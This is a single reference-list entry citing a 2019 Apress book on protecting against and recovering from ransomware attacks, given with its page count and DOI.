  23. Hassan NA. Ransomware Revealed: A Beginner's Guide to Protecting and Recovering from Ransomware Attacks. Apress; 2019. 209 p. DOI: 10.1007/978-1-4842-4255-1
